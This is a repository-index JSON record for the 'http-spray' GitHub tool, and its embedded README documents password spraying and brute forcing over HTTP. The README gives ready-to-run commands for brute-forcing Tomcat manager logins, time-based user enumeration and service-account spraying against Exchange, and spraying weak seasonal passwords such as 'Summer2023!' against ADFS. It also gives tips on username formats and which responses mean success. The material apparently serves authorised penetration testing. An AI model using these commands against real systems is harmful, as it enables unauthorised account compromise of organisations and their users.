{"id":20812751,"url":"https://github.com/dadevel/http-spray","last_synced_at":"2025-03-12T05:13:20.548Z","repository":{"id":246184703,"uuid":"820349255","full_name":"dadevel/http-spray","owner":"dadevel","description":"Password Spraying and Brute Forcing over HTTP(S)","archived":false,"fork":false,"pushed_at":"2025-02-19T23:31:53.000Z","size":30,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-20T00:31:06.218Z","etag":null,"topics":["brute-force","http","password-spraying"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/dadevel.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-06-26T09:42:33.000Z","updated_at":"2025-02-19T23:31:47.000Z","dependencies_parsed_at":"2025-01-18T14:54:11.703Z","dependency_job_id":"4c4599ac-2d62-4916-b20d-0093eeab963e","html_url":"https://github.com/dadevel/http-spray","commit_stats":null,"previous_names":["dadevel/http-spray"],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fhttp-spray/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/dadevel","download_url":"https://codeload.github.com/dadevel/http-spray/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243159180,"owners_count":20245675,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["brute-force","http","password-spraying"],"created_at":"2024-11-17T20:57:55.660Z","updated_at":"2025-03-12T05:13:20.542Z","avatar_url":"https://github.com/dadevel.png","language":"Python","readme":"# http-spray\n\n## Setup\n\nInstall with [pipx](https://github.com/pypa/pipx/).\n\n~~~ bash\npipx install git+https://github.com/dadevel/http-spray.git\n~~~\n\n## Usage\n\nBrute force Tomcat manager.\n\n~~~ bash\ncurl -LO https://github.com/dadevel/wordlists/raw/main/passwords/tomcat-credentials.txt\nhttp-spray -t https://app.corp.com/tomcat/manager/html -m basic -C ./tomcat-credentials.txt | tee -a ./http-spray.json | jq -c 'select(.status_code != 401)'\n~~~\n\nTime-based user enumeration against on-prem Exchange server.\nRequests for valid users take about 0.1s, invalid users take more than 1.5s.\n\n~~~ bash\nhttp-spray -t https://mail.corp.com/rpc/ -m basic -U ./users.txt -p '' | tee -a ./http-spray.json | jq -c 'select(.time \u003c 0.5)'\n~~~\n\n\u003e **Note:**\n\u003e\n\u003e The user enumeration requires basic authentication and seems to work only with the user formats `corp\\jdoe` and `corp.com\\jdoe` where `jdoe` is the *samaccountname*.\n\nSpray common service accounts against on-prem Exchange server.\n\n~~~ bash\nhttp-spray -t https://mail.corp.com/rpc/ -m ntlm -c scanner:scanner -c printer:printer | tee -a ./http-spray.json | jq -c 'select(.status_code != 401)'\n~~~\n\n\u003e **Note:**\n\u003e\n\u003e The RPC endpoint returns 404 for successful logins.\n\u003e For alternate endpoints see [here](https://github.com/dadevel/wordlists/raw/main/windows/exchange.txt).\n\u003e\n\u003e Furthermore Exchange accepts the following username formats: `jdoe`, `corp\\jdoe`, `corp.com\\jdoe` and `jdoe@corp.com` where `jdoe` is the *samaccountname*.\n\u003e Depending on the environment the *mail* attribute, e.g. `john.doe@corp.com`, might work for the OWA web login.\n\nSpray weak passwords against ADFS trough OAuth2 password grant.\n\n~~~ bash\nhttp-spray -t https://sts.corp.com/adfs/oauth2/token/ -m oauth --client-id 11111111-2222-3333-4444-555555555555 --resource https://app.corp.com/ -U ./users.txt -p 'Summer2023!' -p 'Winter2023!' | tee -a ./http-spray.json | jq -c 'select(.status_code == 200)'\n~~~\n\nSpray weak passwords against ADFS trough NTLM authentication.\n\n~~~ bash\nhttp-spray -t https://sts.corp.com/adfs/services/trust/2005/windowstransport -m ntlm -U ./users.txt -p 'Summer2023!' -p 'Winter2023!' | tee -a ./http-spray.json\n~~~\n\n\u003e **Note:**\n\u003e\n\u003e ADFS accepts the following username formats: `corp\\jdoe`, `corp.com\\jdoe` and `jdoe@corp.com` where `jdoe` is the *samaccountname*.\n\u003e Depending on the environment the *mail* attribute, e.g. `john.doe@corp.com`, might work as well.\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdadevel%2Fhttp-spray","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdadevel%2Fhttp-spray","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdadevel%2Fhttp-spray/lists"}